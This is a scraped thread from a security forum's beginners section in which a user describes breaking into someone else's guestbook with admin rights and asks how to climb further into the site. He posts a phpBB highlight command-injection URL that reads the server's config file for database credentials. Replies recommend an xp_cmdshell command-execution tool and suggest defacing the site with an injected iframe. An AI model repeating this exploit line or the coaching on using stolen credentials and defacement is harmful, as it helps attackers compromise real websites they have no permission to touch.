Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 28, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 624
Members: 0
Total: 624
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Newbies corner -> Tons Of Questions
Post new topic  Reply to topic View previous topic :: View next topic 
Tons Of Questions
PostPosted: Wed Dec 29, 2004 1:32 pm Reply with quote
Injector
Active user
Active user
 
Joined: Dec 29, 2004
Posts: 49




Question 1
Sorry I'm not so good at injection and I really am trying to learn. I was able to get inside a guestbook with admin rights. And now I want to write some php so i could climb up to the main index page but everytime I write I get this error.
Code:
Warning: fopen(./templates/url.php): failed to open stream: Permission denied in /home/srath/public_html/guest/lib/admin.class.php on line 180

Warning: fwrite(): supplied argument is not a valid stream resource in /home/srath/public_html/guest/lib/admin.class.php on line 181

Warning: fclose(): supplied argument is not a valid stream resource in /home/srath/public_html/guest/lib/admin.class.php on line 187


Is there anyway I could bypass this or something or is there any other way else i could inject some codes?

-----------------------------------------
Question 2
I used this exploit

Code:
http: // [target]/forum/viewtopic.php? p=123*highlight = % 2527. $ poster = % 60$ls%60. % 2527*ls=id; uname%20-a; cat%20config.php|grep%20db

And I got this "kdihssad9)\b#i" so I already know that this is the database password. I also did this to get the dbname. So I already got the dbname and dbpassword. I tried logging in using "kdihssad9" and the username but it dint work. So my question is how do I use the dbname and dbpasswd? sorry if this is abit noobish, my apologies.
View user's profile Send private message
PostPosted: Fri Dec 31, 2004 6:25 pm Reply with quote
Injector
Active user
Active user
 
Joined: Dec 29, 2004
Posts: 49




any help?
View user's profile Send private message
PostPosted: Thu Jan 13, 2005 12:09 pm Reply with quote
qr4t
Regular user
Regular user
 
Joined: Nov 21, 2004
Posts: 11
Location: Estonia




Q2:
Now you should use programs similar to this (its not very good but the first i found) http://packetstorm.linuxsecurity.com/0102-exploits/SQLExec.zip, it connects to mssql port 1433 and if user/pass correct you can execute commands if the server has xp_cmdshell enabled.
View user's profile Send private message MSN Messenger
PostPosted: Mon Feb 28, 2005 2:30 am Reply with quote
Srat
Beginner
Beginner
 
Joined: Feb 28, 2005
Posts: 1




Question 1:
The user runing the guestbook dont have enough permissions to write into the template script, so forget it, the best u can do for a deface is change the HTML Enable On and insert some HTML like an Iframe or somethin
Q2:
U need a MySQL Manager
View user's profile Send private message
Tons Of Questions
  www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.163 Seconds